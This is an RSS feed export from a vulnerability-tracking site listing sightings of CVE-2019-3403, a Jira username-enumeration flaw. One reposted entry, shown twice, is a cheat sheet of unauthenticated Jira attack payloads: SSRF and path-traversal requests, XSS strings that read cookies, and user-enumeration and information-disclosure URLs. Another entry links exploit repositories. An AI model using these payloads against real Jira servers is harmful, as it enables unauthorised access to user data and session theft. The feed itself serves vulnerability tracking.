https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Thu, 28 May 2026 20:32:48 +0000 https://vulnerability.circl.lu/sighting/c686003a-ec8b-474c-a2b3-ce412f4ad707/export {"uuid": "c686003a-ec8b-474c-a2b3-ce412f4ad707", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "seen", "source": "https://t.me/cve_mitre_org/139", "content": "CVE-2019-3403 The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. https://t.co/pe7wdRqJuk\u2014 CVE (@CVEnew) May 22, 2019\n\nMay 22, 2019 at 09:45PM\nvia Twitter https://twitter.com/CVEnew", "creation_timestamp": "2019-05-22T18:48:18.000000Z"} {"uuid": "c686003a-ec8b-474c-a2b3-ce412f4ad707", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "seen", "source": "https://t.me/cve_mitre_org/139", "content": "CVE-2019-3403 The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. https://t.co/pe7wdRqJuk\u2014 CVE (@CVEnew) May 22, 2019\n\nMay 22, 2019 at 09:45PM\nvia Twitter https://twitter.com/CVEnew", "creation_timestamp": "2019-05-22T18:48:18.000000Z"} https://vulnerability.circl.lu/sighting/c686003a-ec8b-474c-a2b3-ce412f4ad707/export Wed, 22 May 2019 18:48:18 +0000 https://vulnerability.circl.lu/sighting/34b8d104-dede-40b2-bd37-04623caf5b1c/export {"uuid": "34b8d104-dede-40b2-bd37-04623caf5b1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/164", "content": "# Unauthenticated Jira CVEs\n1. CVE-2017-9506 (SSRF)\nhttps:///plugins/servlet/oauth/users/icon-uri?consumerUri=\n2. CVE-2018-20824 (XSS)\nhttps:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n3. CVE-2019-8451 (SSRF)\nhttps:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com\n4. CVE-2019-8449 (User Information Disclosure)\nhttps:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n5. CVE-2019-8442 (Sensitive Information Disclosure)\nhttps:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n6. CVE-2019-3403 (User Enumeration)\nhttps:///rest/api/2/user/picker?query=\n7. CVE-2020-14181 (User Enumeration)\nhttps:///secure/ViewUserHover.jspa?username=\n8. CVE-2020-14178 (Project Key Enumeration)\nhttps:///browse.\n9. CVE-2020-14179 (Information Disclosure)\nhttps:///secure/QueryComponent!Default.jspa\n10. CVE-2019-11581 (Template Injection)\n/secure/ContactAdministrators!default.jspa\n\n* Try the SSTI Payloads\n11. CVE-2019-3396 (Path Traversal)\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nReferer: {{Hostname}}\nContent-Length: 168\nConnection: close\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n\n*Try above request with the Jira target\n12. CVE-2019-3402 (XSS)\nhttps:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search\n/secure/ConfigurePortalPages!default.jspa?view=popular\n/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false\n/secure/ContactAdministrators!default.jspa\n/servicedesk/customer/user/login\n/issues/?jql=\n/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com\n/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com\n/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n/secure/QueryComponent!Default.jspa\n/secure/ViewUserHover.jspa\n/ViewUserHover.jspa?username=Admin\n/rest/api/2/dashboard?maxResults=100\n/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(\u2018XSS\u2019)%22%3E.vm\n/rest/api/2/user/picker?query=admin\n/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/rest/api/2/user/picker?query=admin\n/s/\n/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl\n/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search\nConfigurePortalPages.jspa\n/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true\nREPORTS:- \nhttps://hackerone.com/reports/713900\nhttps://hackerone.com/reports/1103582\nhttps://hackerone.com/reports/380354\nhttps://hackerone.com/reports/197726\nhttps://hackerone.com/reports/632808", "creation_timestamp": "2024-03-18T07:23:33.000000Z"} {"uuid": "34b8d104-dede-40b2-bd37-04623caf5b1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/164", "content": "# Unauthenticated Jira CVEs\n1. CVE-2017-9506 (SSRF)\nhttps:///plugins/servlet/oauth/users/icon-uri?consumerUri=\n2. CVE-2018-20824 (XSS)\nhttps:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n3. CVE-2019-8451 (SSRF)\nhttps:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com\n4. CVE-2019-8449 (User Information Disclosure)\nhttps:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n5. CVE-2019-8442 (Sensitive Information Disclosure)\nhttps:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n6. CVE-2019-3403 (User Enumeration)\nhttps:///rest/api/2/user/picker?query=\n7. CVE-2020-14181 (User Enumeration)\nhttps:///secure/ViewUserHover.jspa?username=\n8. CVE-2020-14178 (Project Key Enumeration)\nhttps:///browse.\n9. CVE-2020-14179 (Information Disclosure)\nhttps:///secure/QueryComponent!Default.jspa\n10. CVE-2019-11581 (Template Injection)\n/secure/ContactAdministrators!default.jspa\n\n* Try the SSTI Payloads\n11. CVE-2019-3396 (Path Traversal)\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nReferer: {{Hostname}}\nContent-Length: 168\nConnection: close\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n\n*Try above request with the Jira target\n12. CVE-2019-3402 (XSS)\nhttps:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search\n/secure/ConfigurePortalPages!default.jspa?view=popular\n/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false\n/secure/ContactAdministrators!default.jspa\n/servicedesk/customer/user/login\n/issues/?jql=\n/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com\n/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com\n/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n/secure/QueryComponent!Default.jspa\n/secure/ViewUserHover.jspa\n/ViewUserHover.jspa?username=Admin\n/rest/api/2/dashboard?maxResults=100\n/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(\u2018XSS\u2019)%22%3E.vm\n/rest/api/2/user/picker?query=admin\n/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/rest/api/2/user/picker?query=admin\n/s/\n/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl\n/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search\nConfigurePortalPages.jspa\n/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true\nREPORTS:- \nhttps://hackerone.com/reports/713900\nhttps://hackerone.com/reports/1103582\nhttps://hackerone.com/reports/380354\nhttps://hackerone.com/reports/197726\nhttps://hackerone.com/reports/632808", "creation_timestamp": "2024-03-18T07:23:33.000000Z"} https://vulnerability.circl.lu/sighting/34b8d104-dede-40b2-bd37-04623caf5b1c/export Mon, 18 Mar 2024 07:23:33 +0000 https://vulnerability.circl.lu/sighting/7137238e-d276-4c96-9703-593c94c2c588/export {"uuid": "7137238e-d276-4c96-9703-593c94c2c588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2581", "content": "#exploit\n#Infographics\nUnauthenticated JIRA CVEs to Exploit:\nCVE-2020-14179 - Information Disclosure\nhttps://github.com/c0brabaghdad1/CVE-2020-14179\nCVE-2020-14181 - User Enumeration\nhttps://github.com/Rival420/CVE-2020-14181\nCVE-2020-14178 - Project Key Enumeration\nCVE-2019-3402 - XSS \nCVE-2019-11581 - SSTI\nCVE-2019-8451 - SSRF\nCVE-2019-8449 - User Information Disclosure\nCVE-2019-3403 - User Enumeration\nCVE-2019-8442 - Sensitive Info Disclosure\nhttps://mobile.twitter.com/harshbothra_/status/1346109605756116995", "creation_timestamp": "2024-10-09T19:49:41.000000Z"} {"uuid": "7137238e-d276-4c96-9703-593c94c2c588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2581", "content": "#exploit\n#Infographics\nUnauthenticated JIRA CVEs to Exploit:\nCVE-2020-14179 - Information Disclosure\nhttps://github.com/c0brabaghdad1/CVE-2020-14179\nCVE-2020-14181 - User Enumeration\nhttps://github.com/Rival420/CVE-2020-14181\nCVE-2020-14178 - Project Key Enumeration\nCVE-2019-3402 - XSS \nCVE-2019-11581 - SSTI\nCVE-2019-8451 - SSRF\nCVE-2019-8449 - User Information Disclosure\nCVE-2019-3403 - User Enumeration\nCVE-2019-8442 - Sensitive Info Disclosure\nhttps://mobile.twitter.com/harshbothra_/status/1346109605756116995", "creation_timestamp": "2024-10-09T19:49:41.000000Z"} https://vulnerability.circl.lu/sighting/7137238e-d276-4c96-9703-593c94c2c588/export Wed, 09 Oct 2024 19:49:41 +0000 https://vulnerability.circl.lu/sighting/5979ded9-b1d2-44cb-a48b-d5959c35ad84/export {"uuid": "5979ded9-b1d2-44cb-a48b-d5959c35ad84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "seen", "source": "https://gist.github.com/marcostolosa/bf0f4a6ea030bc83c2d8dde8df077407", "content": "", "creation_timestamp": "2025-04-13T12:04:46.000000Z"} {"uuid": "5979ded9-b1d2-44cb-a48b-d5959c35ad84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "seen", "source": "https://gist.github.com/marcostolosa/bf0f4a6ea030bc83c2d8dde8df077407", "content": "", "creation_timestamp": "2025-04-13T12:04:46.000000Z"} https://vulnerability.circl.lu/sighting/5979ded9-b1d2-44cb-a48b-d5959c35ad84/export Sun, 13 Apr 2025 12:04:46 +0000